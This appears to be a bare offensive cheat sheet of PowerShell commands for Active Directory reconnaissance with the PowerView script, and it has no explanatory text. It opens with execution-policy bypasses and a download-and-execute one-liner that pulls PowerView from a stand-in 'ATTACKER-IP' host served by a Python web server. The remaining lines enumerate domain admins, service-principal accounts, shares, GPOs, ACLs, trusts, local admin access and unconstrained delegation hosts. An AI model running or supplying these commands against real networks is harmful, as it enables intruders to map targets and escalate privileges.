powershell -ep bypass
powershell.exe -ExecutionPolicy Bypass -NoProfile
powershell -ExecutionPolicy Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER-IP/PowerView.ps1')"
python3 -m http.server 80
IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER-IP/PowerView.ps1')
Invoke-WebRequest http://ATTACKER-IP/PowerView.ps1 -OutFile PowerView.ps1
Import-Module .\PowerView.ps1
Get-Command *Domain*
Get-Command *Net*
Get-Domain
Get-DomainSID
Get-DomainPolicy
(Get-DomainPolicy)."SystemAccess"
(Get-DomainPolicy)."KerberosPolicy"
Get-DomainController
Get-NetDomain
Get-NetDomainSID
Get-NetDomainPolicy
Get-NetDomainController
Get-DomainUser
Get-DomainUser -Identity <user> -Properties *
Get-DomainUser -SPN
Get-DomainUser -AdminCount
Get-DomainUser -TrustedToAuth
Get-NetLoggedon -ComputerName <computer>
Get-NetUser
Get-NetUser -UserName <user>
Get-NetUser -SPN
Get-NetUser -AdminCount
Get-DomainComputer
Get-DomainComputer -OperatingSystem "*Server*"
Get-LastLoggedOn -ComputerName <computer>
Get-NetComputer
Get-NetComputer -OperatingSystem "*Server*"
Get-DomainGroup
Get-DomainGroup *admin*
Get-DomainGroupMember -Identity "Domain Admins" -Recurse
Get-DomainGroup -UserName <user>
Get-NetGroup
Get-NetGroupMember -GroupName "Domain Admins"
Find-DomainShare
Find-DomainShare -CheckShareAccess
Invoke-ShareFinder
Get-NetFileServer
Get-DomainGPO
Get-DomainGPO -ComputerName <computer>
Find-GPOComputerAdmin -ComputerName <computer>
Find-GPOLocation -Identity <user>
Get-NetGPO
Get-DomainOU
Get-NetOU
Get-DomainObjectAcl -Identity <object> -ResolveGUIDs
Invoke-ACLScanner -ResolveGUIDs
Get-ObjectAcl -SamAccountName <object>
Get-DomainTrust
Get-DomainTrustMapping
Get-NetDomainTrust
Get-Forest
Get-ForestDomain
Get-ForestGlobalCatalog
Get-NetForest
Get-NetForestDomain
Find-LocalAdminAccess
Invoke-UserHunter
Invoke-EnumerateLocalAdmin
Get-DomainComputer -Unconstrained
Get-NetComputer -Unconstrained